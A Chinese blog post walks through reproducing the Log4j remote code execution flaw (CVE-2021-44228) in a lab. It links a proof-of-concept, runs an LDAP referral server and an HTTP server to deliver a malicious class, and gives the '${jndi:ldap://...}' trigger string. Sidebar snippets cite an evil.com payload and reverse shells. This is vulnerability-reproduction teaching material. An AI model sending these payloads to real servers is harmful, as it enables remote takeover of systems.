Log4j远程代码执行漏洞(CVE-2021-44228)漏洞复现

最新推荐文章于 2024-05-29 12:38:45 发布
最新推荐文章于 2024-05-29 12:38:45 发布
阅读量1w 收藏 17
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全 java 网络安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rpsate/article/details/121867782
版权

基本信息

漏洞编号:CVE-2021-44228
影响版本:2.x<=2.15.0-rc1
poc地址:https://gitee.com/lcosmos/apache-log4j-poc
在此十分感谢我的寝室长Cosmos提供的poc和技术支持。

原理简述

当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,程序就会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行。

漏洞复现

首先安装maven依赖,并配置环境变量。安装方法请参考:https://jingyan.baidu.com/article/e4d08ffde8d4b24fd2f60dce.html

安装后执行mvn --version,如果出现版本信息则说明安装成功,如下图所示:

在这里插入图片描述

然后更换maven源,因为poc所需要的依赖需要通过maven下载,更换成国内的源可以大大提高下载速度,更换源的方法可以参考:https://www.cnblogs.com/c2g5201314/p/14399714.html

然后用ide打开poc项目,在Exploit.java中写入要执行的命令,如下图所示:

在这里插入图片描述

然后通过javac命令将Exploit.java编译成class文件。

cd src/main/java 
javac Exploit.java

在这里插入图片描述

需要配置一下LDAPRefServer文件,该文件的作用就是启动一个LDAP服务。如下图所示1389就是LDAP服务的端口,http://192.168.119.1:8099/#Exploit就是class文件的地址。

上面class文件地址中#号必须加上,文件的class后缀需要省略。LDAP服务返回http://192.168.119.1:8099/#Exploit就是让靶机去http://192.168.119.1:8099下载Exploit.class文件并执行。

在这里插入图片描述

然后点击依次右边的Maven和compile,这会自动下载所需的依赖包。等待下载完依赖后就点击LDAPRefServer.java文件中的小三角图形启动LDAP服务。

在这里插入图片描述

然后来到Exploit.class文件所在目录下执行python -m http.server 8099启动http服务,也可以用其他方法,只要提供一个能下载Exploit.class的http服务即可。

注意http服务ip和端口要与LDAPRefServer.java文件中ip和端口对应。

在这里插入图片描述

然后运行Log4j.java文件,这个文件执行内容是通过log4j框架打印日志${jndi:ldap://192.168.119.1:1389/a},其中192.168.119.1:1389是lDAP服务的ip地址和端口。然后就会发现命令执行成功了。

在这里插入图片描述

参考文献

https://gitee.com/lcosmos/apache-log4j-poc/blob/master/README.md

https://jingyan.baidu.com/article/e4d08ffde8d4b24fd2f60dce.html

https://www.cnblogs.com/c2g5201314/p/14399714.html

rpsate
关注
  • 13
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
log4j2远程代码执行RCE漏洞复现CVE-2021-44228
m0_57379855的博客
03-06 585
RCE远程代码执行漏洞复现log4jLog4jLDAPJNDIJNDI注入漏洞流程Log4j影响范围和排查方法修复漏洞 Log4j Log for Java,Apach的开源日志记录组件,使用非常广泛 使用方法: 1.pom引入依赖 2.获得logger实例 3.logger.info() debug() error() warn() LDAP lightweight directory access protocol轻量级目录访问协议(目录服务)默认端口389 可以批量登录 JNDI LDAP目录服务,R
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6016
log4j 漏洞CVE-2021-44228 漏洞复现
Struts2 CVE-2021-44228 log4j POC
不光要学,知识要能说出口
12-28 2811
随着log4j漏洞的出现,众多框架受到影响,大家都在研究不同框架的利用点在何处,下面总结的是Struts2目前的poc
Apache Log4j2代码执行漏洞复现cve-2021-44228
Bird&Bird
12-14 9556
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
CVE-2021-44228漏洞复现
最新发布
m0_65764670的博客
05-29 1284
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7252
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2的漏洞复现以及利用该漏洞进行命令执行RCE,反弹shell。
手把手教你复现Log4j2漏洞,千万别中招!
Java知音
12-13 2183
点击关注公众号,实用技术文章及时了解来源:blog.csdn.net/qq_40989258/article/details/1218623630x00 简介ApacheLog4j2是一个...
Log4j2远程命令执行CVE-2021-44228
qq_40646572的博客
05-12 1409
我采用的是较为简单便捷的方法进行复现,全程只是使用了JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具,另外,还可以使用ysoserial-0.0.6-SNAPSHOT-all.jar以及marshalsec-0.0.3-SNAPSHOT-all.jar。使用jndi注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar ,进行rmi注入。启动服务后,进入主页面,点击页面中的?链接,跳转到,目标地址。及时升级log4j组件。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
04-08
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
Apache Log4j2远程代码执行漏洞复现 CVE-2021-44228,python编写POC
wangqiao258的博客
12-15 5831
环境搭建: 使用docker拉取: [root@www /]# docker pull vulfocus/log4j2-rce-2021-12-09 运行: [root@www /]# docker run -P vulfocus/log4j2-rce-2021-12-09 查看端口: [root@www ]# docker ps CONTAINER ID IMAGE
Log4j2远程代码执行漏洞CVE-2021-44228
wangzhifei1的博客
01-16 2087
CVE-2021-44228,被广泛称为“Log4Shell”,是一个高危的远程代码执行漏洞,影响了Apache Log4j 2,这是一个在Java应用程序中广泛使用的日志记录库。
apache log4j漏洞复现
热门推荐
Shanfenglan's blog
12-10 6万+
文章目录1. Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用 1. Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 利用条件
Apache Log4j 远程命令执行漏洞CVE-2021-44228
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-09 1324
Apache Log4j 远程命令执行漏洞CVE-2021-44228 通过jndi协议远程调用恶意类执行命令
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2327
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞
Apache Log4j远程代码执行漏洞CVE-2021-44228)临时防护
03-07
答:针对Apache Log4j远程代码执行漏洞CVE-2021-44228),可以采取以下临时防护措施:1.升级Log4j版本至2.15.或以上;2.禁用Log4j JNDI功能;3.在防火墙上禁止外部访问Log4j JNDI服务;4.在应用程序中禁用Log4j JNDI功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

rpsate

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值